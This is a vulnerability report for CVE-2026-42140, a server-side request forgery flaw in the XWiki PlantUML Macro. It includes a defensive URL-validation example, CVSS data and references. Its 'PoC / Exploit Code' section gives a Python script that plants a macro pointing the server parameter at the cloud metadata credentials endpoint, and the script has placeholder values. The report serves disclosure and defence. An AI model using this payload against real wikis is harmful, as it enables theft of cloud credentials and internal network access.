Security Vulnerability Report

CVE-2026-42140

Published: 2026-05-04 18:16:32
Last Modified: 2026-05-07 15:43:40

Description

PlantUML Macro is a macro for rendering UML diagrams from simple textual schemes. Prior to version 2.4.1, the PlantUML Macro is vulnerable to Server-Side Request Forgery (SSRF). The macro allows users to specify an alternative PlantUML server via the server parameter. However, the application does not validate the supplied URL. An attacker can supply an internal IP address or a malicious external URL. The XWiki server will attempt to connect to this URL to "render" the diagram. This issue has been patched in version 2.4.1.
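The missing control described above is validation of the user-supplied server URL before the wiki connects to it. The following is an added example of such a check written for this report, not the macro's own code or the 2.4.1 patch; the allowlist contents and function names are assumptions.

```python
import ipaddress
from urllib.parse import urlsplit

# Constructed allowlist for this example. A real deployment would load the
# permitted PlantUML server hosts from wiki configuration, not from user input.
ALLOWED_PLANTUML_HOSTS = {"www.plantuml.com", "plantuml.internal.example"}
ALLOWED_SCHEMES = {"http", "https"}


def is_disallowed_ip(host: str) -> bool:
    """True if host is an IP literal in a range a renderer must never contact
    (loopback, RFC 1918, link-local such as 169.254.0.0/16, multicast, ...)."""
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return False  # not an IP literal; hostnames are handled by the allowlist
    return (ip.is_private or ip.is_loopback or ip.is_link_local
            or ip.is_multicast or ip.is_reserved or ip.is_unspecified)


def validate_server_url(url: str) -> tuple[bool, str]:
    """Decide whether a user-supplied 'server' parameter may be used.

    The allowlist is the primary control; the address-range check is defence
    in depth. At connect time the resolved addresses of an allowlisted host
    should be checked the same way, so a rebinding DNS name cannot bypass it.
    Returns (accepted, reason).
    """
    parts = urlsplit(url.strip())
    if parts.scheme not in ALLOWED_SCHEMES:
        return False, "scheme must be http or https"
    if parts.username or parts.password:
        return False, "credentials in URL are not allowed"
    host = parts.hostname  # lower-cased; IPv6 brackets already stripped
    if not host:
        return False, "missing host"
    if is_disallowed_ip(host):
        return False, "internal or non-routable address"
    if host not in ALLOWED_PLANTUML_HOSTS:
        return False, "host not in the configured allowlist"
    return True, "ok"


if __name__ == "__main__":
    for candidate in ("https://www.plantuml.com/plantuml",
                      "http://169.254.169.254/latest/meta-data/",
                      "http://0x7f000001/"):
        print(candidate, "->", validate_server_url(candidate))
```

Non-standard address encodings such as `0x7f000001` are not parsed as IP literals, which is why the allowlist, not the range check, is the decision that must hold.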

CVSS Details

CVSS Score
4.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

XWiki PlantUML Macro < 2.4.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# Target XWiki instance URL
target_url = "http://vulnerable-xwiki-instance/xwiki/bin/view/Main/WebHome"

# Internal IP address to scan (e.g., AWS metadata service)
internal_target = "http://169.254.169.254/latest/meta-data/iam/security-credentials/"

# The payload exploiting the 'server' parameter in PlantUML Macro
# Syntax depends on how the macro is invoked (e.g., in wiki content)
payload_content = "{{plantuml server='{}'}}\n@startuml\nBob -> Alice : SSRF Test\n@enduml".format(internal_target)

# Data to simulate editing or creating a page with the malicious macro
# Note: Actual API endpoints may vary based on XWiki configuration
data = {
    "form_token": "<valid_token_if_needed>",
    "content": payload_content,
    "title": "SSRF_PoC_Page",
}

try:
    # Sending the request to create/update the page
    response = requests.post(target_url, data=data)
    if response.status_code == 200:
        print("[+] Payload sent successfully.")
        print("[+] Check the server logs or the rendered page for SSRF indicators.")
        print("[+] If the internal service is accessible, sensitive data might be leaked in the diagram rendering process.")
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
except Exception as e:
    print(f"[-] An error occurred: {e}")

References

https://github.com/xwiki-contrib/macro-plantuml/commit/c8b19bda93058794e04c8862fc7ca85c59b5fe5c
https://github.com/xwiki-contrib/macro-plantuml/security/advisories/GHSA-42fc-7w97-8vrc
https://jira.xwiki.org/browse/PLANTUML-25

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-42140", "sourceIdentifier": "[email protected]", "published": "2026-05-04T18:16:31.677", "lastModified": "2026-05-07T15:43:39.827", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "PlantUML Macro is a macro for rendering UML diagrams from simple textual schemes. Prior to version 2.4.1, the PlantUML Macro is vulnerable to Server-Side Request Forgery (SSRF). The macro allows users to specify an alternative PlantUML server via the server parameter. However, the application does not validate the supplied URL. An attacker can supply an internal IP address or a malicious external URL. The XWiki server will attempt to connect to this URL to \"render\" the diagram. This issue has been patched in version 2.4.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 4.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-918"}]}], "references": [{"url": "https://github.com/xwiki-contrib/macro-plantuml/commit/c8b19bda93058794e04c8862fc7ca85c59b5fe5c", "source": "[email protected]"}, {"url": "https://github.com/xwiki-contrib/macro-plantuml/security/advisories/GHSA-42fc-7w97-8vrc", "source": "[email protected]"}, {"url": "https://jira.xwiki.org/browse/PLANTUML-25", "source": "[email protected]"}]}}